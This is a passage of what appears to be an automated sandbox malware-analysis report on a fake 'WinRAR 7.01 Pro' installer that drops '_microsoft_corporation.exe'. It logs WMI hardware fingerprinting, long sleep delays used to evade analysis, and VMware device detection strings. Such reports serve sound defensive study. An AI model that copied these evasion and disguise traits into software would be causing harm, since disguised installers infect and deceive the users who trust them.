          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeMemory allocated: 26D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeMemory allocated: 2780000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeMemory allocated: 26D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeMemory allocated: 26286F80000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeMemory allocated: 2628B370000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeMemory allocated: 6A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeMemory allocated: 2610000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeMemory allocated: 5700000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeMemory allocated: 6700000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599328Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599216Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598891Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598641Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598531Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598422Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598312Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597984Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597763Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597641Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597453Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597344Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597219Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597109Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596890Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596781Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596668Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596538Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596422Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596312Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 595969Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWindow / User API: threadDelayed 2079Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWindow / User API: threadDelayed 7582Jump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe TID: 7512Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -24903104499507879s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -599656s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -599547s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -599437s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -599328s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -599216s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -599109s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -599000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -598891s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -598766s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -598641s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -598531s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -598422s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -598312s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -598203s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -598094s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -597984s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -597875s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -597763s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -597641s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -597453s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -597344s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -597219s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -597109s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -597000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -596890s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -596781s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -596668s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -596538s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -596422s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -596312s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -596203s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -596094s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -595969s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -100000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -99891s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -99766s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -99641s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -99532s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -99407s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -99226s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -99109s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -98997s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -98891s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -98766s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -98657s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804Thread sleep time: -98532s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BB34D0 SendDlgItemMessageW,GetDlgItem,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,1_2_00007FF6C3BB34D0
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC9B40 FindFirstFileExW,1_2_00007FF6C3BC9B40
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BA1F08 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00007FF6C3BA1F08
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BB88A0 VirtualQuery,GetSystemInfo,1_2_00007FF6C3BB88A0
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599328Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599216Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598891Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598641Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598531Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598422Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598312Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 598094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597984Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597763Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597641Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597453Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597344Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597219Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597109Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 597000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596890Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596781Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596668Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596538Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596422Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596312Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 596094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 595969Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 100000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 99891Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 99766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 99641Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 99532Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 99407Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 99226Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 99109Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 98997Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 98891Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 98766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 98657Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeThread delayed: delay time: 98532Jump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
          Source: winrar_x64_701ar.exe, 00000001.00000002.2995358335.0000025A83034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}si
          Source: winrar_x64_701ar.exe, 00000001.00000003.2948327551.000002628B70F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
          Source: winrar_x64_701ar.exe, 00000001.00000003.2247409938.000002628B695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\S
          Source: winrar_x64_701ar.exe, 00000001.00000003.2557359939.000002628B6B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\9
          Source: winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\MYqj
          Source: winrar_x64_701ar.exe, 00000001.00000003.2247409938.000002628B6B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B6A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&55
          Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&&
          Source: winrar_x64_701ar.exe, 00000001.00000003.2247409938.000002628B695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r
          Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B6A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAV
          Source: winrar_x64_701ar.exe, 00000001.00000002.2998601755.000002628712C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d{y
          Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\%
          Source: winrar_x64_701ar.exe, 00000001.00000003.2557359939.000002628B6B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&M
          Source: winrar_x64_701ar.exe, 00000001.00000003.2809054918.000002628B6B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\vv
          Source: winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: winrar_x64_701ar.exe, 00000001.00000003.2557840945.0000025A83085000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\m
